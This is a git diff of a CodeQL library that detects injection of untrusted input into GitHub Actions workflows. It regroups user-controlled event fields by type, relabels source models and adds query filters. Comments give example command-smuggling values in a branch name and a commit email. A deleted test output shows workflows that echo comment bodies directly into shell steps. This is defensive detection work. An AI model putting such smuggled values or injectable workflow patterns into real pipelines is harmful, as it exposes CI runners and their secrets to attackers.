"github\\.event\\.pull_request\\.head\\.repo\\.description", // description + "github\\.event\\.workflow_run\\.head_repository\\.description", // description + "github\\.event\\.client_payload\\[[0-9]+\\]", // payload + "github\\.event\\.client_payload", // payload + "github\\.event\\.inputs\\[[0-9]+\\]", // input + "github\\.event\\.inputs", // input ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) @@ -53,22 +77,59 @@ private predicate isExternalUserControlledPullRequest(string context) { } bindingset[context] -private predicate isExternalUserControlledReview(string context) { - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp("github\\.event\\.review\\.body")) +private predicate repoNameEvent(string context) { + exists(string reg | + reg = + [ + // repo name + // Owner: All characters must be either a hyphen (-) or alphanumeric + // Repo: All code points must be either a hyphen (-), an underscore (_), a period (.), or an ASCII alphanumeric code point + "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.repo\\.name", // repo name + "github\\.event\\.workflow_run\\.head_repository\\.name", // repo name + "github\\.event\\.workflow_run\\.head_repository\\.full_name", // nwo + ] + | + Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + ) } bindingset[context] -private predicate isExternalUserControlledComment(string context) { - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp("github\\.event\\.comment\\.body")) +private predicate branchEvent(string context) { + exists(string reg | + reg = + [ + // branch + // https://docs.github.com/en/get-started/using-git/dealing-with-special-characters-in-branch-and-tag-names + // - They can include slash / for hierarchical (directory) grouping, but no slash-separated component can begin with a dot . or end with the sequence .lock. + // - They must contain at least one / + // - They cannot have two consecutive dots .. anywhere. + // - They cannot have ASCII control characters (i.e. bytes whose values are lower than \040, or \177 DEL), space, tilde ~, caret ^, or colon : anywhere. + // - They cannot have question-mark ?, asterisk *, or open bracket [ anywhere. + // - They cannot begin or end with a slash / or contain multiple consecutive slashes + // - They cannot end with a dot . + // - They cannot contain a sequence @{ + // - They cannot be the single character @ + // - They cannot contain a \ + // eg: zzz";echo${IFS}"hello";# would be a valid branch name + "github\\.event\\.pull_request\\.head\\.repo\\.default_branch", + "github\\.event\\.pull_request\\.head\\.ref", "github\\.head_ref", + "github\\.event\\.workflow_run\\.head_branch", + "github\\.event\\.workflow_run\\.head_branch", + "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.ref", + ] + | + Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + ) } bindingset[context] -private predicate isExternalUserControlledGollum(string context) { +private predicate labelEvent(string context) { exists(string reg | reg = [ - "github\\.event\\.pages\\[[0-9]+\\]\\.page_name", - "github\\.event\\.pages\\[[0-9]+\\]\\.title" + // label + // - They cannot contain a escaping \ + "github\\.event\\.pull_request\\.head\\.label", ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) @@ -76,19 +137,18 @@ private predicate isExternalUserControlledGollum(string context) { } bindingset[context] -private predicate isExternalUserControlledCommit(string context) { +private predicate emailEvent(string context) { exists(string reg | reg = [ - "github\\.event\\.commits\\[[0-9]+\\]\\.message", "github\\.event\\.head_commit\\.message", + // email + // `echo${IFS}hello`@domain.com "github\\.event\\.head_commit\\.author\\.email", - "github\\.event\\.head_commit\\.author\\.name", "github\\.event\\.head_commit\\.committer\\.email", - "github\\.event\\.head_commit\\.committer\\.name", "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.email", - "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.name", "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.email", - "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.name", + "github\\.event\\.workflow_run\\.head_commit\\.author\\.email", + "github\\.event\\.workflow_run\\.head_commit\\.committer\\.email", ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) @@ -96,32 +156,31 @@ private predicate isExternalUserControlledCommit(string context) { } bindingset[context] -private predicate isExternalUserControlledDiscussion(string context) { +private predicate usernameEvent(string context) { exists(string reg | - reg = ["github\\.event\\.discussion\\.title", "github\\.event\\.discussion\\.body"] + reg = + [ + // username + // All characters must be either a hyphen (-) or alphanumeric + "github\\.event\\.head_commit\\.author\\.name", + "github\\.event\\.head_commit\\.committer\\.name", + "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.name", + "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.name", + "github\\.event\\.workflow_run\\.head_commit\\.author\\.name", + "github\\.event\\.workflow_run\\.head_commit\\.committer\\.name", + ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) ) } bindingset[context] -private predicate isExternalUserControlledWorkflowRun(string context) { +private predicate pathEvent(string context) { exists(string reg | reg = [ - "github\\.event\\.workflow\\.path", "github\\.event\\.workflow_run\\.head_branch", - "github\\.event\\.workflow_run\\.display_title", - "github\\.event\\.workflow_run\\.head_branch", - "github\\.event\\.workflow_run\\.head_repository\\.description", - "github\\.event\\.workflow_run\\.head_repository\\.full_name", - "github\\.event\\.workflow_run\\.head_repository\\.name", - "github\\.event\\.workflow_run\\.head_commit\\.message", - "github\\.event\\.workflow_run\\.head_commit\\.author\\.email", - "github\\.event\\.workflow_run\\.head_commit\\.author\\.name", - "github\\.event\\.workflow_run\\.head_commit\\.committer\\.email", - "github\\.event\\.workflow_run\\.head_commit\\.committer\\.name", - "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.ref", - "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.repo\\.name", + // filename + "github\\.event\\.workflow\\.path", ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) @@ -129,45 +188,52 @@ private predicate isExternalUserControlledWorkflowRun(string context) { } bindingset[context] -private predicate isExternalUserControlledRepositoryDispatch(string context) { +private predicate jsonEvent(string context) { exists(string reg | - reg = ["github\\.event\\.client_payload\\[[0-9]+\\]", "github\\.event\\.client_payload",] + reg = + [ + // json + "github\\.event", + ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) ) } -bindingset[context] -private predicate isExternalUserControlledWorkflowDispatch(string context) { - exists(string reg | reg = ["github\\.event\\.inputs\\[[0-9]+\\]", "github\\.event\\.inputs",] | - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) - ) -} +class EventSource extends RemoteFlowSource { + string flag; -private class EventSource extends RemoteFlowSource { EventSource() { exists(Expression e, string context | this.asExpr() = e and context = e.getExpression() | - isExternalUserControlled(context) or - isExternalUserControlledIssue(context) or - isExternalUserControlledPullRequest(context) or - isExternalUserControlledReview(context) or - isExternalUserControlledComment(context) or - isExternalUserControlledGollum(context) or - isExternalUserControlledCommit(context) or - isExternalUserControlledDiscussion(context) or - isExternalUserControlledWorkflowRun(context) or - isExternalUserControlledRepositoryDispatch(context) or - isExternalUserControlledWorkflowDispatch(context) + titleEvent(context) and flag = "title" + or + urlEvent(context) and flag = "url" + or + textEvent(context) and flag = "text" + or + repoNameEvent(context) and flag = "repo name" + or + branchEvent(context) and flag = "branch" + or + labelEvent(context) and flag = "label" + or + emailEvent(context) and flag = "email" + or + usernameEvent(context) and flag = "username" + or + pathEvent(context) and flag = "filename" + or + jsonEvent(context) and flag = "json" ) } - override string getSourceType() { result = "User-controlled events" } + override string getSourceType() { result = flag } } /** * A Source of untrusted data defined in a MaD specification */ -private class ExternallyDefinedSource extends RemoteFlowSource { +class ExternallyDefinedSource extends RemoteFlowSource { string sourceType; ExternallyDefinedSource() { externallyDefinedSource(this, sourceType, _) } @@ -178,19 +244,19 @@ private class ExternallyDefinedSource extends RemoteFlowSource { /** * An input for a Composite Action */ -private class CompositeActionInputSource extends RemoteFlowSource { +class CompositeActionInputSource extends RemoteFlowSource { CompositeAction c; CompositeActionInputSource() { c.getAnInput() = this.asExpr() } - override string getSourceType() { result = "Composite action input" } + override string getSourceType() { result = "input" } } /** * A downloadeded artifact. */ -private class ArtifactToOptionSource extends RemoteFlowSource { - ArtifactToOptionSource() { this.asExpr() instanceof UntrustedArtifactDownloadStep } +private class ArtifactSource extends RemoteFlowSource { + ArtifactSource() { this.asExpr() instanceof UntrustedArtifactDownloadStep } - override string getSourceType() { result = "Step output from Artifact" } + override string getSourceType() { result = "artifact" } } diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index cdcc1dbdf818..6e6e768bdf79 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -7,14 +7,6 @@ import codeql.actions.DataFlow abstract class EnvVarInjectionSink extends DataFlow::Node { } -// predicate envVarInjectionFromEnvVarSink(DataFlow::Node sink) { -// exists(Expression expr, Run run, string varName, string key, string value | -// expr = run.getInScopeEnvVarExpr(varName) and -// Utils::writeToGitHubEnv(run, key, value) and -// expr = sink.asExpr() and -// value.matches("%$" + ["", "{", "ENV{"] + varName + "%") -// ) -// } class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { EnvVarInjectionFromEnvVarSink() { exists(Run run, Expression expr, string varname, string key, string value | diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml index 63e99abd4d35..fe3c3e58b5f9 100644 --- a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml +++ b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["ahmadnassri/action-changed-files", "*", "output.files", "PR changed files", "manual"] - - ["ahmadnassri/action-changed-files", "*", "output.json", "PR changed files", "manual"] + - ["ahmadnassri/action-changed-files", "*", "output.files", "filename", "manual"] + - ["ahmadnassri/action-changed-files", "*", "output.json", "json", "manual"] diff --git a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml index f2b8c8549a90..4d12a2936969 100644 --- a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml +++ b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["amannn/action-semantic-pull-request", "*", "output.error_message", "PR title", "manual"] + - ["amannn/action-semantic-pull-request", "*", "output.error_message", "text", "manual"] diff --git a/ql/lib/ext/cypress-io_github-action.model.yml b/ql/lib/ext/cypress-io_github-action.model.yml index 21688675a2ed..a4539923b35f 100644 --- a/ql/lib/ext/cypress-io_github-action.model.yml +++ b/ql/lib/ext/cypress-io_github-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["cypress-io/github-action", "*", "env.GH_BRANCH", "PR branch", "manual"] + - ["cypress-io/github-action", "*", "env.GH_BRANCH", "branch", "manual"] diff --git a/ql/lib/ext/dawidd6_action-download-artifact.model.yml b/ql/lib/ext/dawidd6_action-download-artifact.model.yml index f90eaeb7271b..472778d33b4b 100644 --- a/ql/lib/ext/dawidd6_action-download-artifact.model.yml +++ b/ql/lib/ext/dawidd6_action-download-artifact.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["dawidd6/action-download-artifact", "*", "output.artifacts", "Artifact details", "manual"] + - ["dawidd6/action-download-artifact", "*", "output.artifacts", "artifact", "manual"] diff --git a/ql/lib/ext/dorny_paths-filter.model.yml b/ql/lib/ext/dorny_paths-filter.model.yml index 14743f2819ed..79621a6a30c6 100644 --- a/ql/lib/ext/dorny_paths-filter.model.yml +++ b/ql/lib/ext/dorny_paths-filter.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["dorny/paths-filter", "*", "output.changes", "PR changed files", "manual"] + - ["dorny/paths-filter", "*", "output.changes", "filename", "manual"] diff --git a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml index ecfce617df45..71d837742315 100644 --- a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml +++ b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "PR body", "manual"] - - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_TITLE", "PR title", "manual"] + - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "text", "manual"] + - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_TITLE", "title", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml index acb5d462d15a..062203945c50 100644 --- a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml +++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml @@ -8,4 +8,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["googlecloudplatform/magic-modules", "*", "output.changed-files", "PR changed files", "manual"] + - ["googlecloudplatform/magic-modules", "*", "output.changed-files", "filename", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml b/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml index 0d96077345f5..9cc02d3b38c7 100644 --- a/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["puppeteer/puppeteer/.github/workflows/changed-packages.yml", "*", "output.changes", "Changed files", "manual"] + - ["puppeteer/puppeteer/.github/workflows/changed-packages.yml", "*", "output.changes", "filename", "manual"] diff --git a/ql/lib/ext/jitterbit_get-changed-files.model.yml b/ql/lib/ext/jitterbit_get-changed-files.model.yml index 38253b689340..e74f953a1a15 100644 --- a/ql/lib/ext/jitterbit_get-changed-files.model.yml +++ b/ql/lib/ext/jitterbit_get-changed-files.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["jitterbit/get-changed-files", "*", "output.all", "PR changed files", "manual"] - - ["jitterbit/get-changed-files", "*", "output.added", "PR changed files", "manual"] - - ["jitterbit/get-changed-files", "*", "output.modified", "PR changed files", "manual"] - - ["jitterbit/get-changed-files", "*", "output.removed", "PR changed files", "manual"] - - ["jitterbit/get-changed-files", "*", "output.renamed", "PR changed files", "manual"] - - ["jitterbit/get-changed-files", "*", "output.added_modified", "PR changed files", "manual"] - - ["jitterbit/get-changed-files", "*", "output.deleted", "PR changed files", "manual"] + - ["jitterbit/get-changed-files", "*", "output.all", "filename", "manual"] + - ["jitterbit/get-changed-files", "*", "output.added", "filename", "manual"] + - ["jitterbit/get-changed-files", "*", "output.modified", "filename", "manual"] + - ["jitterbit/get-changed-files", "*", "output.removed", "filename", "manual"] + - ["jitterbit/get-changed-files", "*", "output.renamed", "filename", "manual"] + - ["jitterbit/get-changed-files", "*", "output.added_modified", "filename", "manual"] + - ["jitterbit/get-changed-files", "*", "output.deleted", "filename", "manual"] diff --git a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml index bbfc0bed1dfb..9a58d9a764ff 100644 --- a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml +++ b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "Comment body", "manual"] - - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "Comment body", "manual"] + - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "text", "manual"] + - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "text", "manual"] diff --git a/ql/lib/ext/marocchino_on_artifact.model.yml b/ql/lib/ext/marocchino_on_artifact.model.yml index 7a556a0f0ece..c8646cffe8ef 100644 --- a/ql/lib/ext/marocchino_on_artifact.model.yml +++ b/ql/lib/ext/marocchino_on_artifact.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["marocchino/on_artifact", "*", "output.*", "Downloaded artifact", "manual"] + - ["marocchino/on_artifact", "*", "output.*", "artifact", "manual"] diff --git a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml index 9b0ec011fd62..a85a4b466e25 100644 --- a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml +++ b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["redhat-plumbers-in-action/download-artifact", "*", "output.*", "Downloaded artifact", "manual"] + - ["redhat-plumbers-in-action/download-artifact", "*", "output.*", "artifact", "manual"] diff --git a/ql/lib/ext/tj-actions_branch-names.model.yml b/ql/lib/ext/tj-actions_branch-names.model.yml index 753303b0cb3d..d98eda4e69f8 100644 --- a/ql/lib/ext/tj-actions_branch-names.model.yml +++ b/ql/lib/ext/tj-actions_branch-names.model.yml @@ -4,7 +4,7 @@ extensions: extensible: sourceModel data: # https://github.com/tj-actions/branch-names - - ["tj-actions/branch-names", "*", "output.current_branch", "PR current branch", "manual"] - - ["tj-actions/branch-names", "*", "output.head_ref_branch", "PR head branch", "manual"] - - ["tj-actions/branch-names", "*", "output.ref_branch", "Branch tirggering workflow run", "manual"] + - ["tj-actions/branch-names", "*", "output.current_branch", "branch", "manual"] + - ["tj-actions/branch-names", "*", "output.head_ref_branch", "branch", "manual"] + - ["tj-actions/branch-names", "*", "output.ref_branch", "branch", "manual"] diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml index fb15abce061d..60fa01495733 100644 --- a/ql/lib/ext/tj-actions_changed-files.model.yml +++ b/ql/lib/ext/tj-actions_changed-files.model.yml @@ -3,20 +3,20 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["tj-actions/changed-files", "*", "output.added_files", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.copied_files", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.deleted_files", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.modified_files", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.renamed_files", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.type_changed_files", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.unmerged_files", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.unknown_files", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.all_changed_files", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.other_changed_files", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.all_modified_files", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.other_modified_files", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.other_deleted_files", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.modified_keys", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.changed_keys", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.added_files", "filename", "manual"] + - ["tj-actions/changed-files", "*", "output.copied_files", "filename", "manual"] + - ["tj-actions/changed-files", "*", "output.deleted_files", "filename", "manual"] + - ["tj-actions/changed-files", "*", "output.modified_files", "filename", "manual"] + - ["tj-actions/changed-files", "*", "output.renamed_files", "filename", "manual"] + - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "filename", "manual"] + - ["tj-actions/changed-files", "*", "output.type_changed_files", "filename", "manual"] + - ["tj-actions/changed-files", "*", "output.unmerged_files", "filename", "manual"] + - ["tj-actions/changed-files", "*", "output.unknown_files", "filename", "manual"] + - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "filename", "manual"] + - ["tj-actions/changed-files", "*", "output.all_changed_files", "filename", "manual"] + - ["tj-actions/changed-files", "*", "output.other_changed_files", "filename", "manual"] + - ["tj-actions/changed-files", "*", "output.all_modified_files", "filename", "manual"] + - ["tj-actions/changed-files", "*", "output.other_modified_files", "filename", "manual"] + - ["tj-actions/changed-files", "*", "output.other_deleted_files", "filename", "manual"] + - ["tj-actions/changed-files", "*", "output.modified_keys", "filename", "manual"] + - ["tj-actions/changed-files", "*", "output.changed_keys", "filename", "manual"] diff --git a/ql/lib/ext/tj-actions_verify-changed-files.model.yml b/ql/lib/ext/tj-actions_verify-changed-files.model.yml index 8e4938368b8c..9dccf6d5e6c6 100644 --- a/ql/lib/ext/tj-actions_verify-changed-files.model.yml +++ b/ql/lib/ext/tj-actions_verify-changed-files.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["tj-actions/verify-changed-files", "*", "output.changed-files", "PR changed files", "manual"] + - ["tj-actions/verify-changed-files", "*", "output.changed-files", "filename", "manual"] diff --git a/ql/lib/ext/trilom_file-changes-action.model.yml b/ql/lib/ext/trilom_file-changes-action.model.yml index 61141e5f73ba..b8fb2514253c 100644 --- a/ql/lib/ext/trilom_file-changes-action.model.yml +++ b/ql/lib/ext/trilom_file-changes-action.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["trilom/file-changes-action", "*", "output.files", "PR changed files", "manual"] - - ["trilom/file-changes-action", "*", "output.files_added", "PR changed files", "manual"] - - ["trilom/file-changes-action", "*", "output.files_modified", "PR changed files", "manual"] - - ["trilom/file-changes-action", "*", "output.files_removed", "PR changed files", "manual"] + - ["trilom/file-changes-action", "*", "output.files", "filename", "manual"] + - ["trilom/file-changes-action", "*", "output.files_added", "filename", "manual"] + - ["trilom/file-changes-action", "*", "output.files_modified", "filename", "manual"] + - ["trilom/file-changes-action", "*", "output.files_removed", "filename", "manual"] diff --git a/ql/lib/ext/tzkhan_pr-update-action.model.yml b/ql/lib/ext/tzkhan_pr-update-action.model.yml index c80590e49315..499161aafcb3 100644 --- a/ql/lib/ext/tzkhan_pr-update-action.model.yml +++ b/ql/lib/ext/tzkhan_pr-update-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["tzkhan/pr-update-action", "*", "output.headMatch", "", "manual"] + - ["tzkhan/pr-update-action", "*", "output.headMatch", "branch", "manual"] diff --git a/ql/lib/ext/xt0rted_slash-command-action.model.yml b/ql/lib/ext/xt0rted_slash-command-action.model.yml index 2a4378d17126..173ecfc4222f 100644 --- a/ql/lib/ext/xt0rted_slash-command-action.model.yml +++ b/ql/lib/ext/xt0rted_slash-command-action.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["xt0rted/slash-command-action", "*", "output.command-arguments", "", "manual"] - - ["xt0rted/slash-command-action", "*", "output.command-arguments", "", "manual"] + - ["xt0rted/slash-command-action", "*", "output.command-arguments", "text", "manual"] + - ["xt0rted/slash-command-action", "*", "output.command-arguments", "text", "manual"] diff --git a/ql/src/Security/CWE-077/EnvPathInjection.ql b/ql/src/Security/CWE-077/EnvPathInjection.ql index 720b7aed8cc4..50ad01497035 100644 --- a/ql/src/Security/CWE-077/EnvPathInjection.ql +++ b/ql/src/Security/CWE-077/EnvPathInjection.ql @@ -25,6 +25,12 @@ where exists(Job j | j = sink.getNode().asExpr().getEnclosingJob() and not j.isPrivileged() + ) and + ( + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" + or + source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + sink.getNode() instanceof EnvPathInjectionFromFileReadSink ) ) select sink.getNode(), source, sink, diff --git a/ql/src/Security/CWE-077/EnvVarInjection.ql b/ql/src/Security/CWE-077/EnvVarInjection.ql index af3f2998cc9d..109d77d74256 100644 --- a/ql/src/Security/CWE-077/EnvVarInjection.ql +++ b/ql/src/Security/CWE-077/EnvVarInjection.ql @@ -25,7 +25,14 @@ where exists(Job j | j = sink.getNode().asExpr().getEnclosingJob() and not j.isPrivileged() - ) + ) and + ( + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" + or + source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + sink.getNode() instanceof EnvVarInjectionFromFileReadSink + ) and + not source.getNode().(RemoteFlowSource).getSourceType() = "branch" ) select sink.getNode(), source, sink, "Potential environment variable injection in $@, which may be controlled by an external user.", diff --git a/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql b/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql index 3e7c74ab895e..593fd620c9f5 100644 --- a/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql +++ b/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql @@ -22,6 +22,12 @@ where exists(Job j | j = sink.getNode().asExpr().getEnclosingJob() and j.isPrivileged() + ) and + ( + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" + or + source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + sink.getNode() instanceof EnvPathInjectionFromFileReadSink ) select sink.getNode(), source, sink, "Potential privileged PATH environment variable injection in $@, which may be controlled by an external user.", diff --git a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql index aac7568e6548..bf637af11958 100644 --- a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql +++ b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql @@ -22,7 +22,14 @@ where exists(Job j | j = sink.getNode().asExpr().getEnclosingJob() and j.isPrivileged() - ) + ) and + ( + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" + or + source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + sink.getNode() instanceof EnvVarInjectionFromFileReadSink + ) and + not source.getNode().(RemoteFlowSource).getSourceType() = "branch" select sink.getNode(), source, sink, "Potential privileged environment variable injection in $@, which may be controlled by an external user.", sink, sink.getNode().toString() diff --git a/ql/test/library-tests/test.actual b/ql/test/library-tests/test.actual deleted file mode 100644 index ee68d409634e..000000000000 --- a/ql/test/library-tests/test.actual +++ /dev/null @@ -1,598 +0,0 @@ -files -| .github/workflows/expression_nodes.yml:0:0:0:0 | .github/workflows/expression_nodes.yml | -| .github/workflows/multiline.yml:0:0:0:0 | .github/workflows/multiline.yml | -| .github/workflows/test.yml:0:0:0:0 | .github/workflows/test.yml | -workflows -| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/test.yml:1:1:40:53 | on: push | -reusableWorkflows -compositeActions -jobs -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | -localJobs -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | -extJobs -steps -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -runSteps -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' 